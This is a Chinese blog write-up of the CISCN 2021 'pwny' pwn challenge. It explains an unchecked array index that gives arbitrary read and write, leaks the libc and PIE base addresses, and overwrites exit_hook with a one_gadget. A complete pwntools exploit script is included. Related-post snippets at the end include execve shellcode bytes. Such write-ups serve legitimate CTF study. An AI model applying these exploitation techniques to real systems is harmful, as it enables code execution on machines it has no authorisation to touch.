[pie+libc]national2021_pwny

最新推荐文章于 2022-04-14 15:33:33 发布
最新推荐文章于 2022-04-14 15:33:33 发布
阅读量185 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/116999806
版权

[pie+libc]国赛_pwny

1. ida 分析

  1. write函数并没有对输入的index做合法性检验,第一次read函数由于fd不合法不会执行,但可以往任意地址写入一个0字符

    在这里插入图片描述

  2. fd紧接着array,可以将fd覆盖为0,可以实现任意写

    在这里插入图片描述

  3. 当fd = 0 时,通过read函数可以通过输入index执行任意读

    在这里插入图片描述

2. 思路(通过数组进行任意地址读写)

  1. 先通过write方法覆盖fd为0,就有了任意读

    def write(index):
    p.sendlineafter('Your choice: ','2')
    p.sendlineafter('Index: ',str(index))


def read(index):
    p.sendlineafter('our choice: ','1')
    p.sendlineafter('Index: ',p64(index))

write(256)
write(256)

  2. 通过read方法,输入想要输出的函数的地址相对于array的偏移(按字节算),就可以泄漏libc以及pie的基址

    在这里插入图片描述

    在这里插入图片描述

    ptr = 0x202060
stdin = 0x202030
#泄漏libc中的函数地址
stdin_index = (stdin - ptr)/8 #0xFFFFFFFFFFFFFFFA
log.success('stdin_index==>'+hex(stdin_index))
read(0xFFFFFFFFFFFFFFFA)
p.recvuntil('Result: ')
stdin_addr = int(p.recv(12),16)
log.success('stdin_addr==>'+hex(stdin_addr))
libc_base = stdin_addr - libc.sym['_IO_2_1_stdin_']
log.success('libc_base=>'+hex(libc_base))
one = libc_base + 0x10a428
#泄漏程序段代码无关的地址 - 偏移就得到codebase
unk = 0x202008
unk_index = (unk - ptr)/8 #0xFFFFFFFFFFFFFFF5
log.success('unk==>'+hex(unk_index))
read(0xFFFFFFFFFFFFFFF5)
p.recvuntil('Result: ')
unk_addr = int(p.recv(12),16)
log.success('unk_addr ==>'+hex(unk_addr))
pie = unk_addr - unk
log.success('pie==>'+hex(pie))

  3. 有了libc以及pie的基址,通过write中的read,就可以实现任意写,将exit_hook改成onegadge

    exit_hook = libc_base + 0x61bf60
log.success('exit_hook=>'+hex(exit_hook))
exit_index = (exit_hook - pie -ptr)/8
log.success('exit_index=>'+hex(exit_index))
gdb.attach(p)
write(exit_index)
p.send(p64(one))

    • 这里的exit_hook的地址,通过p _rtld_global找出结构体中,exit_hook的地址,可以看到在结构体的最下面

      在这里插入图片描述

    • 下面显示结构体的地址,定位到_dl_rtld_lock_recursive

      在这里插入图片描述

    • 可以看到_dl_rtld_lock_recursive,相对于_rtld_global的偏移为3840,得到_dl_rtld_lock_recursive的实际地址 - libc的基址,就能得到exit_hook在libc中的偏移

      在这里插入图片描述

  4. 程序正常exit即可触发onegadget

3. exp

from pwn import *
p = process('./pwny')
context.log_level = 'debug'
libc = ELF('./libc-2.27.so')
def write(index):
    p.sendlineafter('Your choice: ','2')
    p.sendlineafter('Index: ',str(index))


def read(index):
    p.sendlineafter('our choice: ','1')
    p.sendlineafter('Index: ',p64(index))

write(256)
write(256)

ptr = 0x202060
stdin = 0x202030
stdin_index = (stdin - ptr)/8 #0xFFFFFFFFFFFFFFFA
log.success('stdin_index==>'+hex(stdin_index))

read(0xFFFFFFFFFFFFFFFA)
p.recvuntil('Result: ')
stdin_addr = int(p.recv(12),16)
log.success('stdin_addr==>'+hex(stdin_addr))
libc_base = stdin_addr - libc.sym['_IO_2_1_stdin_']
log.success('libc_base=>'+hex(libc_base))
one = libc_base + 0x10a428
unk = 0x202008
unk_index = (unk - ptr)/8 #0xFFFFFFFFFFFFFFF6
log.success('unk==>'+hex(unk_index))

read(0xFFFFFFFFFFFFFFF5)
p.recvuntil('Result: ')
unk_addr = int(p.recv(12),16)
log.success('unk_addr ==>'+hex(unk_addr))
pie = unk_addr - unk
log.success('pie==>'+hex(pie))

exit_hook = libc_base + 0x61bf60
log.success('exit_hook=>'+hex(exit_hook))
exit_index = (exit_hook - pie -ptr)/8
log.success('exit_index=>'+hex(exit_index))
gdb.attach(p)
write(exit_index)
p.send(p64(one))

p.interactive()
huzai9527
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2libc(可绕NX但不可绕PIE和ASLR,因为PIE会使ELF本身随机化,ASLR会使libc.so基址随机化)
EternalBurning的博客
11-12 412
ret2libc能直接找到system和/bin/shchecksec泄漏点偏移libc调用exp找不到/bin/shchecksec检查漏洞函数确认偏移查找是否有系统调用字符串 能直接找到system和/bin/sh checksec 泄漏点 偏移 108+4=112 libc调用 程序中有外部引入system()函数 所以我们接下来找/bin/sh就可以了 exp 找不到/bin...
PIE保护绕过
weixin_30633949的博客
09-14 1745
(一):partial write 开了PIE保护的程序,其低12位地址是固定的,所以我们可以采用partial write。但是我们不能写入一个半字节,所以选择写入两个字节,倒数地位进行爆破,范围是0到f,例如: list1 = ["x05","x15","x25","x35","x45","x55","x65","x75","x85","x95","xa5","xb5","x...
ciscn2021西北部分pwn
mishixiaodai的博客
05-16 1505
打了一天的国赛,发现自己还是太菜了 pwny 读取随机数到bss段上作为文件描述符范围在0~0xff之间,又在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20可以根据偏移进行任意读操作,因此就可以覆盖fd的值,爆破fd使其等于0,我们就可以进行任意读写 我们可以通过泄露出bss段上的stdout指针指向的_IO_2_1_stdout_的地址来泄露libc的基地址,在通过泄露data段上的off_202008来泄露bss段上的地址,再通过libc上的environ来泄露栈地址。
pie绕过
WateranFire的博客
09-18 784
遇到use after free之类的漏洞时,利用small bin可以获取libc的基址,类似这种格式 p1=malloc(200); p2=malloc(200); free(p1); print(*(unsigned long long*)p1); 然后算一下偏移即可。 或者申请一大片的内存来触发mmap,mmap 分配的内存与 libc 之间存在固定的偏移。 p1=mal...
记一次ret2__libc_start_main某处循环利用程序
qq_39869547的博客
03-08 604
0x1 程序开启了pie,但是程序的ret是__libc_start_main+0x240.此时我们可以部分修改ret为__libc_start_main+0x210左右的位置. 使得程序重新回到main函数,达到重复利用的目的。 0x2 程序中用户输入不能是0x00,所以不能填写地址,不能用rop的方法调用system("/bin/sh")函数 那么我们只能填写ret为one_gadget.来g...
ciscn_2021_pwn_lonelywolf&silverwolf
weixin_49697396的博客
05-18 873
一、lonelywolf 构造double free泄露并打印堆地址,利用堆地址计算tcache_perthread_struct结构体地址 使用double free 攻击tcache_perthread_struct,修改count>7,并使得下一次申请到tcache_perthread_struct位置,并再次留下tcache_perthread_struct地址 利用tcache_perthread_struct的size free后会放入unsorted bin中,可以泄露出libc
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5166
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
Pwn中阶学习1-[栈溢出]/篇3
m0_52343643的博客
04-14 1409
这种题型一般是在题目没有给出程序文件的时候,我们对程序一无所知,对程序是否栈溢出、栈溢出长度、gadget地址,源函数地址等只能进行爆破得到 攻击条件: 程序存在栈溢出漏洞 服务器端的进程在崩溃后会重新启动,且启动进程地址与先前一样。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的。 BROP绕过ASLR、NX、Canary保护 步骤 爆破栈溢出长度 得到漏洞函数或main函数地址(stop gadget:使程序返回地
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1527
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
svg-4-pie.rar_PIE_SVG动画_svg_svg pie
09-24
在这个"svg-4-pie.rar"压缩包中,我们关注的是SVG在创建2D饼图动画方面的应用。 PIEPie)通常指的是数据可视化中的饼图,它用于展示部分与整体之间的关系。SVG Pie是利用SVG元素来构建这种图表的方法。在这个案例...
PIE_encoder_model.zip_PIE_encoder_mod_encoder project_made_rfid
07-14
PIE(Pulse Interval Encoder) Simulink embedded model that i have made for my RFID Project
PIE-Face-Database-of-CMU.zip_CMU PIE数据库_CMU pie 人脸库_CMU_PIE人脸库_P
07-14
PIE FACE 数据库用于计算机视觉中的人脸识别,多姿态,多角度,有不同光照
PIE_decoder_model.zip_PIE RFID_RFID matlab_The Project_decoder s
07-14
PIE(pulse interval decoder)- Its the PIE decoder that I built for my RFID project. Its an ambedded simulink model.
ctf-pwn-patchelf-用题目给的libc运行二进制文件
huzai9527的博客
07-07 5343
用给定的libc进行调试 首先根据题目给你的libc,查找相应版本的连接器 然后去glibc-all-in-one中下载相应的ld文件 glibc-all-in-one安装步骤 https://github.com/matrix1001/glibc-all-in-one 使用 查看各unbuntu版本的glibc ./update_list cat list 下载对应版本的glibc ./download 2.27-3ubuntu1_amd64 下载好的glibc在l
[_IO_FILE] 原理解析
huzai9527的博客
11-10 3706
FSOP CFF-WIKI中有如下描述 FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。 触发条件 梳理一下 FSOP 利用的条件,首先需
IDA修复跳表
huzai9527的博客
11-08 1938
一、 IDA打开遇到JUMP CS命令 这是由于GCC在编译超过5个switch的结构时会用跳表进行优化,变成上面的样子 二、使用EDIT --> other --> specify switch 将光标打在JUMP命令上按TAB键切换到汇编,然后才能进行编辑 我解释一下各个参数的意义 Address of Jump table:跳表的地址,cmp eax 5,之后跳到的地址,这里就是0x69E0 Number of elements:switch 的个数,先前cmp eax 5,
orw_shellcode_模板
huzai9527的博客
05-23 1572
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
glibc中free函数详解
huzai9527的博客
05-27 912
__libc_free详解(tcache 略) 1. 检查是否存在 hook函数,如果有就执行 void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ /* 1. 关于__free_hook,释放时会检查其会否为NULL,否的话就执行相应的函数 2. __free_hook指向的函数,其调用的参数,为chunk中的内容
DINT; HWREGH(PIECTRL_BASE + PIE_O_IER1) = tempPIEIER;
最新发布
06-08
这两行代码的作用是关闭CPU的总中断并恢复之前...在这里,它被用于访问PIE模块的IER1寄存器(即中断使能寄存器1)。tempPIEIER是之前保存的IER1寄存器的值,通过将其赋值给IER1寄存器,可以恢复之前的中断使能状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值